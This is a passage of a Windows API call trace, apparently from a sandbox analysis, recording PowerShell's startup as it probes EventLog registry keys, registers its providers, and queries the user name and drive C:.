hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e39c | out: phkResult=0x25e39c*=0x3a8) returned 0x0 [0044.778] RegCloseKey (hKey=0x3a8) returned 0x0 [0044.778] RegCloseKey (hKey=0x384) returned 0x0 [0044.778] RegCloseKey (hKey=0x3a4) returned 0x0 [0044.778] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e360 | out: phkResult=0x25e360*=0x3a4) returned 0x0 [0044.779] RegQueryInfoKeyW (in: hKey=0x3a4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x25e3c8, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x25e3c4, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x25e3c8*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x25e3c4*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0044.779] RegEnumKeyExW (in: hKey=0x3a4, dwIndex=0x0, lpName=0x54e2a0, lpcchName=0x25e3e4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x25e3e4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0044.779] RegEnumKeyExW (in: hKey=0x3a4, dwIndex=0x1, lpName=0x54e2a0, lpcchName=0x25e3e4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x25e3e4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0044.779] RegEnumKeyExW (in: hKey=0x3a4, dwIndex=0x2, lpName=0x54e2a0, lpcchName=0x25e3e4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x25e3e4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0044.779] RegEnumKeyExW (in: hKey=0x3a4, dwIndex=0x3, lpName=0x54e2a0, lpcchName=0x25e3e4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x25e3e4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0044.779] RegEnumKeyExW (in: hKey=0x3a4, dwIndex=0x4, lpName=0x54e2a0, lpcchName=0x25e3e4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x25e3e4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0044.779] RegEnumKeyExW (in: hKey=0x3a4, dwIndex=0x5, lpName=0x54e2a0, lpcchName=0x25e3e4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x25e3e4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0044.779] RegEnumKeyExW (in: hKey=0x3a4, dwIndex=0x6, lpName=0x54e2a0, lpcchName=0x25e3e4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x25e3e4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0044.779] RegEnumKeyExW (in: hKey=0x3a4, dwIndex=0x7, lpName=0x54e2a0, lpcchName=0x25e3e4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x25e3e4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0044.779] RegEnumKeyExW (in: hKey=0x3a4, dwIndex=0x8, lpName=0x54e2a0, lpcchName=0x25e3e4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x25e3e4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0044.779] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e390 | out: phkResult=0x25e390*=0x384) returned 0x0 [0044.779] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e390 | out: phkResult=0x25e390*=0x0) returned 0x2 [0044.779] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e390 | out: phkResult=0x25e390*=0x3a8) returned 0x0 [0044.779] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e390 | out: phkResult=0x25e390*=0x0) returned 0x2 [0044.779] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e390 | out: phkResult=0x25e390*=0x3ac) returned 0x0 [0044.780] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e390 | out: phkResult=0x25e390*=0x0) returned 0x2 [0044.780] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e390 | out: phkResult=0x25e390*=0x3b0) returned 0x0 [0044.780] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e390 | out: phkResult=0x25e390*=0x0) returned 0x2 [0044.780] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e390 | out: phkResult=0x25e390*=0x3b4) returned 0x0 [0044.780] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e390 | out: phkResult=0x25e390*=0x0) returned 0x2 [0044.780] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e390 | out: phkResult=0x25e390*=0x3b8) returned 0x0 [0044.780] RegOpenKeyExW (in: hKey=0x3b8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e390 | out: phkResult=0x25e390*=0x0) returned 0x2 [0044.780] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e390 | out: phkResult=0x25e390*=0x3bc) returned 0x0 [0044.780] RegOpenKeyExW (in: hKey=0x3bc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e390 | out: phkResult=0x25e390*=0x0) returned 0x2 [0044.781] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e390 | out: phkResult=0x25e390*=0x3c0) returned 0x0 [0044.781] RegOpenKeyExW (in: hKey=0x3c0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e390 | out: phkResult=0x25e390*=0x0) returned 0x2 [0044.781] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e390 | out: phkResult=0x25e390*=0x3c4) returned 0x0 [0044.781] RegOpenKeyExW (in: hKey=0x3c4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e390 | out: phkResult=0x25e390*=0x3c8) returned 0x0 [0044.781] RegCloseKey (hKey=0x3c8) returned 0x0 [0044.781] RegCloseKey (hKey=0x3a4) returned 0x0 [0044.781] RegCloseKey (hKey=0x3c4) returned 0x0 [0044.791] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x50d0004 [0044.793] GetLastError () returned 0x0 [0044.793] ReportEventW (hEventLog=0x50d0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3304a24*="WSMan", lpRawData=0x33048cc) returned 1 [0044.797] GetLastError () returned 0x0 [0044.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25df04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.798] GetLastError () returned 0xcb [0044.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25deb4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.798] GetLastError () returned 0xcb [0044.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25deb4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.798] GetLastError () returned 0xcb [0044.798] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x54ea60, nSize=0x25e504 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x25e504) returned 0x1 [0044.798] GetLastError () returned 0xcb [0044.798] GetUserNameW (in: lpBuffer=0x54e2a0, pcbBuffer=0x25e50c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x25e50c) returned 1 [0044.798] ReportEventW (hEventLog=0x50d0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3308900*="Alias", lpRawData=0x33087bc) returned 1 [0044.798] GetLastError () returned 0x0 [0044.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25df04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.799] GetLastError () returned 0xcb [0044.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25deb4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.799] GetLastError () returned 0xcb [0044.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25deb4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.799] GetLastError () returned 0xcb [0044.799] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x54ea60, nSize=0x25e504 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x25e504) returned 0x1 [0044.799] GetLastError () returned 0xcb [0044.799] GetUserNameW (in: lpBuffer=0x54e2a0, pcbBuffer=0x25e50c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x25e50c) returned 1 [0044.800] ReportEventW (hEventLog=0x50d0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x330c894*="Environment", lpRawData=0x330c750) returned 1 [0044.800] GetLastError () returned 0x0 [0044.800] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x25e034, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0044.800] GetLastError () returned 0xcb [0044.800] SetErrorMode (uMode=0x1) returned 0x1 [0044.800] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x25e4b4 | out: lpFileInformation=0x25e4b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0044.800] GetLastError () returned 0xcb [0044.800] SetErrorMode (uMode=0x1) returned 0x1 [0044.817] GetLogicalDrives () returned 0x4 [0044.817] GetLastError () returned 0xcb [0044.826] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x25df58, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0044.826] GetLastError () returned 0xcb [0044.826] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0044.826] GetLastError () returned 0xcb [0044.826] SetErrorMode (uMode=0x1) returned 0x1 [0044.827] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x54e3a0, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x25e480, lpMaximumComponentLength=0x25e47c, lpFileSystemFlags=0x25e478, lpFileSystemNameBuffer=0x54e2a0, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x25e480*=0x9c354b42, lpMaximumComponentLength=0x25e47c*=0xff, lpFileSystemFlags=0x25e478*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0044.827] GetLastError () returned 0xcb [0044.827] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0044.827] GetLastError () returned 0xcb [0044.827] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x25dfe0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0044.827] GetLastError () returned 0xcb [0044.827] SetErrorMode (uMode=0x1) returned 0x1 [0044.827] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x330dacc | out: lpFileInformation=0x330dacc*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0044.827] GetLastError () returned 0xcb [0044.827] SetErrorMode (uMode=0x1) returned 0x1 [0044.827] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x25dfe0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0044.827] GetLastError () returned 0xcb [0044.827] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x25df6c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0044.827] GetLastError () returned 0xcb [0044.827] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0044.827] GetLastError () returned 0xcb [0044.828] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x25df28, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0044.828] GetLastError () returned 0xcb [0044.828] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0044.828] GetLastError () returned 0xcb [0044.829] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x25df30, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0044.829] GetLastError () returned 0xcb [0044.829] SetErrorMode (uMode=0x1) returned 0x1 [0044.829] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x330e724 | out: lpFileInformation=0x330e724*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0044.829] GetLastError () returned 0xcb [0044.829] SetErrorMode (uMode=0x1) returned 0x1 [0044.829] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x25df38, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0044.829] GetLastError () returned 0xcb [0044.829] SetErrorMode (uMode=0x1) returned 0x1 [0044.829] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x330e874 | out: lpFileInformation=0x330e874*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0044.829] GetLastError () returned 0xcb [0044.829] SetErrorMode (uMode=0x1) returned 0x1 [0044.829] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x25df7c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0044.829] GetLastError () returned 0xcb [0044.829] SetErrorMode (uMode=0x1) returned 0x1 [0044.829] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x330ea14 | out: lpFileInformation=0x330ea14*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0044.829] GetLastError () returned 0xcb [0044.829] SetErrorMode (uMode=0x1) returned 0x1 [0044.829] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x54ea60, nSize=0x25e504 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x25e504) returned 0x1 [0044.830] GetLastError () returned 0xcb [0044.830] GetUserNameW (in: lpBuffer=0x54e2a0, pcbBuffer=0x25e50c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x25e50c) returned 1 [0044.830] ReportEventW (hEventLog=0x50d0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x331179c*="FileSystem", lpRawData=0x3311658) returned 1 [0044.830] GetLastError () returned 0x0 [0044.830] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54e2a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0044.830] GetLastError () returned 0xcb [0044.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25df20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.831] GetLastError () returned 0xcb [0044.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25ded0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.831] GetLastError () returned 0xcb [0044.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25ded0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.831] GetLastError () returned 0xcb [0044.831] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x54ea60, nSize=0x25e504 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x25e504) returned 0x1 [0044.831] GetLastError () returned 0xcb [0044.831] GetUserNameW (in: lpBuffer=0x54e2a0, pcbBuffer=0x25e50c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x25e50c) returned 1 [0044.832] ReportEventW (hEventLog=0x50d0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x331588c*="Function", lpRawData=0x3315748) returned 1 [0044.832] GetLastError () returned 0x0 [0044.832] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54e2a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0044.832] GetLastError () returned 0xcb [0044.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25df18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.834] GetLastError () returned 0xcb [0044.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dec8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.834] GetLastError () returned 0xcb [0044.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dec8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.834] GetLastError () returned 0xcb [0044.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dec8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.834] GetLastError () returned 0xcb [0044.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25df18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.850] GetLastError () returned 0xcb [0044.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dec8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.850] GetLastError () returned 0xcb [0044.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dec8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.850] GetLastError () returned 0xcb [0044.850] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x54ea60, nSize=0x25e504 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x25e504) returned 0x1 [0044.850] GetLastError () returned 0xcb [0044.851] GetUserNameW (in: lpBuffer=0x54e2a0, pcbBuffer=0x25e50c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x25e50c) returned 1 [0044.851] ReportEventW (hEventLog=0x50d0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x332e948*="Registry", lpRawData=0x332e804) returned 1 [0044.851] GetLastError () returned 0x0 [0044.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25df04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.851] GetLastError () returned 0x0 [0044.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25deb4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.851] GetLastError () returned 0x0 [0044.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25deb4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.852] GetLastError () returned 0x0 [0044.852] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x54ea60, nSize=0x25e504 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x25e504) returned 0x1 [0044.852] GetLastError () returned 0x0 [0044.852] GetUserNameW (in: lpBuffer=0x54e2a0, pcbBuffer=0x25e50c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x25e50c) returned 1 [0044.853] ReportEventW (hEventLog=0x50d0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3332730*="Variable", lpRawData=0x33325ec) returned 1 [0044.853] GetLastError () returned 0x0 [0044.853] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54e2a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0044.853] GetLastError () returned 0xcb [0044.855] GetEnvironmentVariableW (in: lpName="MshEnableTrace", 